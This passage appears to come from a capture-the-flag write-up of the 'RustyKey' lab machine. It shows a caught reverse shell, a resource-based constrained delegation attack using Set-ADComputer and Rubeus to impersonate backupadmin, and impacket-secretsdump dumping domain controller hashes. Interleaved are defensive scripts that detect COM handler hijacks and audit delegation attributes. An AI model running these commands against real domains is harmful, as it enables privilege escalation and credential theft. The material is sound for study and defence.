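_ENV = {"%systemroot%": r"C:\Windows", "%programfiles%": r"C:\Program Files"}

RegKeys = Dict[str, Dict[str, Tuple[str, str]]]


def parse_reg_query(output: str) -> RegKeys:
    """reg query /s text -> {key: {value_name: (type, data)}}."""
    keys: RegKeys = {}
    current = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.upper().startswith("HKEY_"):
            current = line
            keys[current] = {}
            continue
        if current is None:
            continue
        parts = line.split(None, 2)   # name, type, data (data may itself contain spaces)
        if len(parts) >= 2 and parts[1].startswith("REG_"):
            keys[current][parts[0]] = (parts[1], parts[2] if len(parts) == 3 else "")
    return keys


def _expand(path: str) -> str:
    out = path
    for var, val in _ENV.items():
        out = re.sub(re.escape(var), lambda m: val, out, flags=re.IGNORECASE)
    return out.strip('"')


def audit_inproc_servers(keys: RegKeys) -> List[Tuple[str, str]]:
    """(CLSID key, DLL path) for every InprocServer32 default outside the trusted directories."""
    findings = []
    for key, values in keys.items():
        if not key.upper().endswith("\\INPROCSERVER32"):
            continue
        _, data = values.get("(Default)", ("", ""))
        path = _expand(data)
        if not any(path.lower().startswith(d.lower() + "\\") for d in TRUSTED_DIRS):
            findings.append((key.rsplit("\\", 1)[0], path))
    return findings


# Constructed sample in the shape of the reg query output above; the first CLSID is the
# page's 7-Zip handler after the hijack, the second is an invented clean entry.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}
    (Default)    REG_SZ    7-Zip Shell Extension

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170f69-40c1-278a-1000-000100020000}\InprocServer32
    (Default)    REG_SZ    C:\ProgramData\a.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-00000000c0de}
    (Default)    REG_SZ    Constructed sample server

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-00000000c0de}\InprocServer32
    (Default)    REG_SZ    %SystemRoot%\System32\sample.dll
    ThreadingModel    REG_SZ    Apartment
"""

if __name__ == "__main__":
    for clsid_key, dll in audit_inproc_servers(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"suspicious InprocServer32: {clsid_key} -> {dll}")
```

Running it over a full `reg query HKLM\SOFTWARE\Classes\CLSID /s` export is slow but cheap to diff day over day; a handler that moves from `C:\Program Files\7-Zip` to `C:\ProgramData` is exactly the change this box relies on.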

Waiting a minute or two results in getting a shell as mm.turner.

konoha# rlwrap -cAr nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.75] 52428
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
whoami
rustykey\mm.turner

Shell as mm.turner

Interesting, we now have a shell as mm.turner, and if we look back at BloodHound we see he's a member of DelegationManagers, which gives us AddAllowedToAct on DC$. So essentially what we have here is RBCD (Resource-Based Constrained Delegation). This article helps explain the theory; what we need to do is set the attribute PrincipalsAllowedToDelegateToAccount on DC$ to allow the computer account we control (IT-Computer3$), and then impersonate a high-privileged user. Using S4U2Self + S4U2Proxy we're able to get a TGS and then use that to authenticate to DC$. As mm.turner we can set the attribute on DC$; for the RBCD step itself we will be using Rubeus.exe.
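`-PrincipalsAllowedToDelegateToAccount` is a friendly front for one LDAP attribute, `msDS-AllowedToActOnBehalfOfOtherIdentity`, which holds a binary security descriptor whose DACL lists the principals allowed to act on behalf of other identities towards this object. The Python below is an added example, not from the writeup, Rubeus or the ActiveDirectory module: it builds that self-relative descriptor for a given SID (the same layout PowerShell writes, with the access mask whose SDDL form is `CCDCLCSWRPWPDTLOCRSDRCWDWO`) and, more usefully for a defender, parses one back into the list of allowed SIDs so it can be diffed against an allowlist. The builder exists so the parser can be exercised offline; the IT-Computer3$ SID is not on the page, so the sample uses the page's domain SID prefix with a placeholder RID. A domain controller's copy of this attribute should normally be empty, and Event 5136 fires on the DC when it is written.

```python
import struct
from typing import Iterable, List, Set, Tuple

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
# Access mask PowerShell writes for -PrincipalsAllowedToDelegateToAccount
# (SDDL: CCDCLCSWRPWPDTLOCRSDRCWDWO)
RBCD_MASK = 0x000F01FF
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...' -> binary SID (revision, count, 6-byte authority, LE sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: " + sid)
    authority = int(parts[2]).to_bytes(6, "big")
    subs = [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + authority + b"".join(struct.pack("<I", s) for s in subs)


def sid_from_bytes(buf: bytes, off: int) -> Tuple[str, int]:
    """Decode a binary SID at offset; returns (string form, bytes consumed)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d%s" % (rev, authority, "".join("-%d" % s for s in subs)), 8 + 4 * count


def build_rbcd_sd(principal_sids: Iterable[str]) -> bytes:
    """Self-relative SD: owner BUILTIN\\Administrators, one ACCESS_ALLOWED ACE per principal."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    aces = b""
    count = 0
    for sid in principal_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size, mask; then the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), RBCD_MASK) + sid_b
        count += 1
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), count, 0) + aces   # AclRevision 4 (ACL_REVISION_DS)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         20, 0, 0, 20 + len(owner))                     # owner, group, sacl, dacl offsets
    return header + owner + acl


def allowed_to_act(blob: bytes) -> List[Tuple[str, int]]:
    """SIDs (with access mask) granted by ACCESS_ALLOWED ACEs in the DACL; empty if there is no DACL."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if rev != 1 or not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
    pos = off_dacl + 8
    out = []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append((sid_from_bytes(blob, pos + 8)[0], mask))
        pos += ace_size   # AceSize skips ACE types this parser does not decode
    return out


def unexpected_delegators(blob: bytes, allowlist: Iterable[str]) -> Set[str]:
    """Principals allowed to act on behalf of others on this object that are not on the allowlist."""
    return {sid for sid, _ in allowed_to_act(blob)} - set(allowlist)


# Constructed: the page's domain SID prefix with a placeholder RID standing in for IT-Computer3$
FAKE_IT_COMPUTER3_SID = "S-1-5-21-3316070415-896458127-4139322052-9999"

if __name__ == "__main__":
    blob = build_rbcd_sd([FAKE_IT_COMPUTER3_SID])
    print(blob.hex())
    print(allowed_to_act(blob), unexpected_delegators(blob, []))
```

To audit a live domain, fetch `msDS-AllowedToActOnBehalfOfOtherIdentity` for every computer object over LDAP and pass each blob to `unexpected_delegators` with an empty allowlist for domain controllers; any SID that comes back is a principal that can impersonate arbitrary users to that host.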

Mom said I’m allowed too Privesc!!

Let's go ahead and get the TGS as backupadmin, and then we can secretsdump.

PS C:\ProgramData> $targetComputer = "CN=DC,OU=DOMAIN CONTROLLERS,DC=RUSTYKEY,DC=HTB"
$targetComputer = "CN=DC,OU=DOMAIN CONTROLLERS,DC=RUSTYKEY,DC=HTB"
PS C:\ProgramData> Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount "CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb"
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount "CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb"
PS C:\ProgramData> .\Rub.exe hash /domain:rustykey.htb /user:IT-Computer3$ /password:<SNIP>
.\Rub.exe hash /domain:rustykey.htb /user:IT-Computer3$ /password:<SNIP>

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password : <SNIP>
[*] Input username : IT-Computer3$
[*] Input domain : rustykey.htb
[*] Salt : RUSTYKEY.HTBhostit-computer3.rustykey.htb
[*] rc4_hmac : <SNIP>
[*] aes128_cts_hmac_sha1 : <SNIP>
[*] aes256_cts_hmac_sha1 : <SNIP>
[*] des_cbc_md5 : <SNIP>

PS C:\ProgramData>./Rub.exe s4u /nowrap /impersonateuser:backupadmin /domain:rustykey.htb /user:IT-Computer3$ /password:<SNIP> /rc4:<SNIP> /msdsspn:host/dc.rustykey.htb /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: S4U

[*] Using rc4_hmac hash: <SNIP>
[*] Building AS-REQ (w/ preauth) for: 'rustykey.htb\IT-Computer3$'
[*] Using domain controller: fe80::bd5e:24aa:d271:1fea%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFmDCCBZSgAwIBBaEDAgEWooIEqDCCBKRhggSgMIIEnKADAgEFoQ4bDFJVU1RZS0VZLkhUQqIhMB
<SNIP>


[*] Action: S4U

[*] Building S4U2self request for: 'IT-Computer3$@RUSTYKEY.HTB'
[*] Using domain controller: dc.rustykey.htb (fe80::bd5e:24aa:d271:1fea%11)
[*] Sending S4U2self request to fe80::bd5e:24aa:d271:1fea%11:88
[+] S4U2self success!
[*] Got a TGS for 'backupadmin' to 'IT-Computer3$@RUSTYKEY.HTB'
[*] base64(ticket.kirbi):

doIFtjCCBbKgAwIBBaEDAgEWooIEzzCCBMthggTHMIIEw6ADAgEFoQ4bDFJVU1RZS0VZLkhUQqIaMB
<SNIP>

[*] Impersonating user 'backupadmin' to target SPN 'host/dc.rustykey.htb'
[*] Building S4U2proxy request for service: 'host/dc.rustykey.htb'
[*] Using domain controller: dc.rustykey.htb (fe80::bd5e:24aa:d271:1fea%11)
[*] Sending S4U2proxy request to domain controller fe80::bd5e:24aa:d271:1fea%11:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'host/dc.rustykey.htb':

doIGfjCCBnqgAwIBBaEDAgEWooIFjzCCBYthggWHMIIFg6ADAgEFoQ4bDFJVU1RZS0VZLkhUQqIiML
<SNIP>
[+] Ticket successfully imported!

For myself, I like to use /ptt which does pass-the-ticket but allows me to know that Rubeus succeeded. Then I can look at the ticket on the host system to make sure everything is correct.

This gets us a TGS for the user backupadmin; from here we can import it and run secretsdump (using a script to convert my base64 TGS).

konoha# source ./converITAll.sh doIGfjCCBnqgAwIBBaEDAgEWooIFjzCCBYthggWHMIIFg6ADAgEFoQ4bDFJ<SNIP>
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] converting kirbi to ccache...
[+] done
Ticket cache: FILE:./Admin.ccache
Default principal: backupadmin@RUSTYKEY.HTB

Valid starting Expires Service principal
07/01/2025 19:55:02 07/02/2025 05:55:02 host/dc.rustykey.htb@RUSTYKEY.HTB
renew until 07/08/2025 19:55:02
konoha# impacket-secretsdump @dc.rustykey.htb -k -no-pass -dc-ip 10.10.11.75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<SNIP>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::